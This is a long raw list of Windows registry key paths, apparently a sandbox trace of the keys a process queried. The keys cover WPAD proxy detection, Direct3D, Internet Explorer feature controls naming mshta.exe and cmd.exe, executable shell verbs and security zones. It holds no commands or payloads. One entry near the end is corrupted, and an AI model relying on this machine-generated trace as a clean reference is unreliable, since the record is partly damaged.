HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDhcp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDns
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\52-54-00-6f-d4-05
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadNetworkName
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Linkage
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Linkage\Export
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\FontCache\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\ClientCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Direct3D
HKEY_LOCAL_MACHINE\Software\Microsoft\Direct3D
HKEY_LOCAL_MACHINE\Software\Microsoft\Direct3D\DriverCompat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Direct3D\DriverCompat\Size
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Direct3D\DriverCompat\Name
HKEY_LOCAL_MACHINE\Software\Microsoft\Direct3D\Drivers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Direct3D\Drivers\Size
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Direct3D\Drivers\Name
HKEY_LOCAL_MACHINE\Software\Microsoft\Direct3D\DX6TextureEnumInclusionList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Direct3D\DX6TextureEnumInclusionList\Size
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Direct3D\DX6TextureEnumInclusionList\Name
HKEY_CURRENT_USER\Software\Microsoft\DXGI
HKEY_LOCAL_MACHINE\Software\Microsoft\DXGI
HKEY_CURRENT_USER\EUDC\1252
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\OperationalData
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionLow
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionHigh
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD\*
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_CURRENT_USER\Software\Microsoft\Avalon.Graphics
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\PrefetchPrerender
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\PrefetchPrerender
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PrefetchPrerender
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PrefetchPrerender\Enabled
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\PrefetchPrerender
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\Content Type
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\NeverShowExt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{210acb58-272f-11e9-8326-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\System.NamespaceCLSID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\{28636AA6-953D-11D2-B5D6-00C04FD918D0} 6
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\NoRecentDocs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00021401-0000-0000-C000-000000000046}\flags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\Compatibility\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\Compatibility\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ANotepad++\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ANotepad++\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\BriefcaseMenu\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\BriefcaseMenu\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Open With\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Open With\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Open With EncryptionMenu\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Open With EncryptionMenu\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Sharing\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Sharing\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\XXX Groove GFS Context Menu Handler XXX\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\XXX Groove GFS Context Menu Handler XXX\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\{90AA3A4E-1CBA-4233-B8BB-535773D48449}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\{a2a9545d-a0c2-42b4-9708-a0b2badd77c8}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\CopyAsPathMenu\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\CopyAsPathMenu\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\SendTo\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\SendTo\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\XXX Groove GFS Context Menu Handler XXX\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\XXX Groove GFS Context Menu Handler XXX\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\{474C98EE-CF3D-41f5-80E3-4AAB0AB04301}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\{596AB062-B4D2-4215-9F74-E9109B0A8153}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C467336-8281-4E60-8204-430CED96822D}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C467336-8281-4E60-8204-430CED96822D}\InprocServer32\LoadWithoutCOM
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\NoRecentDocs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C467336-8281-4E60-8204-430CED96822D}\flags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PropertySystem\PropertyHandlers\.exe\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\DisableProcessIsolation
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\NoOplock
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\UseInProcHandlerCache
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\UseOutOfProcHandlerCache
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{09799AFB-AD67-11d1-ABCD-00C04FC30936}\flags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\NoRecentDocs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{21B22460-3AEA-1069-A2DC-08002B30309D}\flags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\NoStaticDefaultVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ExplorerCommandHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\DelegateExecute
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ExplorerCommandHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\command\DelegateExecute
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\ExplorerCommandHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\command\DelegateExecute
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\LegacyDisable
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\CheckSupportedTypes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\SuppressionPolicyEx
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\SuppressionSlapiPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\LegacyDisable
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\CheckSupportedTypes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\SuppressionPolicyEx
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\SuppressionSlapiPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\LegacyDisable
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\CheckSupportedTypes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SuppressionPolicyEx
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SuppressionSlapiPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\CommandStateHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\DefaultAppliesTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\CommandFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SubCommands
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ExtendedSubCommandsKey
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\HasLUAShield
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\Extended
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\OnlyInBrowserWindow
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ProgrammaticAccessOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\MultiSelectModel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MultipleInvokePromptMinimum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MultipleInvokePromptMinimum
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\MUIVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ClientOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ImpliedSelectionModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\StaticVerbOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\IsInContextMenu
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\PaneVisibleProperty
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\AppliesTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ReadWriteRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\DownloadInvokeDisabled
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\MaxDownloadFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\Position
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SeparatorBefore
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SeparatorAfter
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\CommandStateHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\DefaultAppliesTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\CommandFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\SubCommands
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ExtendedSubCommandsKey
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\HasLUAShield
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\Extended
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\OnlyInBrowserWindow
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ProgrammaticAccessOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\MultiSelectModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\MUIVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ClientOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ImpliedSelectionModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\StaticVerbOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\IsInContextMenu
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\PaneVisibleProperty
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\AppliesTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ReadWriteRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\DownloadInvokeDisabled
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\MaxDownloadFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\Position
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\SeparatorBefore
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\SeparatorAfter
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\CommandStateHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\DefaultAppliesTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\CommandFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\SubCommands
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\ExtendedSubCommandsKey
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\HasLUAShield
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\Extended
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\NeverDefault
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\NoRecentDocs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\NoStaticDefaultVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\NoStaticDefaultVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NoRecentDocs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NoStaticDefaultVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\NoStaticDefaultVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation\AllowedReservedCharacters
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.ade\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.adp\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.asp\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bas\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bat\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cer\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.chm\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cmd\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.com\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cpl\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.crt\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\cmd.exe
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\*
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\cmd.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\*
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\cmd.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\*
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1806
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1806
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\safer\codeidentifiers\TransparentEnabled
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\command
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SetWorkingDirectoryFromTarget
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\NoWorkingDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\LogIgnoreMonitorReason
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\DEPOff
\x1a60\xa7EY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Sorting\Versions\00060101.00060101
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\RtfConverterFlags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Use_DlgBox_Colors
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Anchor Underline
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\CSS_Compat
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Expand Alt Text
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Display Inline Images
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Display Inline Videos
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Display Inline Videos
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Play_Background_Sounds
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Play_Animations
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Print_Background
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Print_Background
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\SmoothScroll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\SmoothScroll
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\XMLHTTP
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Show image placeholders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Show image placeholders
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Disable Script Debugger
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\DisableScriptDebuggerIE
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Disable Diagnostics Mode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Disable Diagnostics Mode
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Move System Caret
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Enable AutoImageResize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Enable AutoImageResize
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\UseHR
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Q300829
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Cleanup HTCs
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\XDomainRequest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\XDomainRequest
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\DOMStorage
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\DOMStorage
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\JScriptProfileCacheEventDelay
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Default_CodePage
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\AutoDetect
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\Default_IEFontSizePrivate
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Anchor Color
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Anchor Color Visited
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Anchor Color Hover
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Always Use My Colors
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Always Use My Font Size
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Always Use My Font Face
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Disable Visited Hyperlinks
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Use Anchor Hover Color
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\MiscFlags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Allow Programmatic Cut_Copy_Paste
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
